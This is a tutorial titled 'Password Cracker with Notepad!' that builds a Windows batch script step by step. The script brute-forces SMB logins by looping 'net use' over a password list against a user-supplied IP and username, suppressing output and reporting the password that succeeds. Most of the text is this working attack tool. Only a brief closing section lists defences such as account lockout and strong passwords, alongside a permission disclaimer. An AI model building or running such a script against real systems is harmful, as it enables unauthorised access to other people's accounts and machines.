Password Cracker with Notepad!

Introduction

In this tutorial, we will create a simple batch file that simulates a brute-force login attempt on a computer using the SMB protocol. This exercise is designed for educational purposes; always ensure you have permission before attempting any testing on networks or systems. Additionally, we will cover how to protect yourself against such attacks.

Chapter 1: Setting Up the Environment

To start, you need a text editor. We recommend using Notepad++ for syntax highlighting.

1. Open Notepad++.

2. Set Language to Batch:

   • Go to Language in the menu.
   • Select B and then Batch.

3. Start the Batch File:

   • Begin your batch file with the following command to prevent command prompt output:

     @echo off
     

Chapter 2: Collecting Input

We will collect three essential pieces of information from the user:

1. IP Address:

   • Prompt the user to enter the target IP address and store it in a variable.

   set /p IP=Enter your IP address: 
   

2. Username:

   • Prompt the user for the username.

   set /p USER=Enter username: 
   

3. Password List:

   • Prompt for the password list file.

   set /p WLIST=Enter password list: 
   

Chapter 3: Looping Through Passwords

Next, we will create a loop that iterates through each password in the provided list.

1. Loop Command:

   • Use the following command structure to loop through the passwords:

   for /f "tokens=*" %%a in (%WLIST%) do (
       echo Attempting %%a
   )
   

2. Testing the Loop:

   • Save your file and run it to ensure the loop correctly reads and outputs each password.

Chapter 4: Performing SMB Login Attempts

Now, we will implement the login attempts using the SMB protocol.

1. Login Command:

   • The command to connect using SMB is:

   net use \\%IP% /user:%USER% %%a
   

2. Error Checking:

   • After each login attempt, check if the login was successful by using the ERRORLEVEL variable:

   if errorlevel 1 (
       echo Login failed for %%a
   ) else (
       call :success %%a
   )
   

3. Success Function:

   • Create a success function to handle successful logins:

   :success
   echo Password found: %1
   pause
   exit
   

Chapter 5: Refining the Code

To improve the user experience and code efficiency, consider the following:

1. Disconnect Command:

   • After a successful login, disconnect from the network to avoid connection issues:

   net use \\%IP% /delete
   

2. Hide Output:

   • To prevent clutter in the output, redirect command outputs:

   net use \\%IP% /user:%USER% %%a >nul 2>&1
   

3. Final Code Structure:

   • Ensure your final script looks organized and easy to read.

Chapter 6: Testing the Script

1. Run the Script:

   • Execute your batch file and input the necessary parameters.
   • Monitor the output for successful or failed attempts.

2. Adjust Password List:

   • You can test the script with different password lists to see how it performs.

Chapter 7: Protecting Yourself

To defend against brute-force attacks:

1. Disable SMB:

   • If not needed, disable SMB on your systems.

2. Use Complex Passwords:

   • Ensure your passwords are complex and not easily found in common lists.

3. Limit Login Attempts:

   • Configure your system to limit login attempts to prevent brute-force attacks.

Conclusion

In this tutorial, we created a batch file to attempt brute-force logins using the SMB protocol and discussed ways to protect against such attacks. Always remember to use these techniques responsibly and only with permission. For further learning, consider exploring more advanced cybersecurity practices and tools.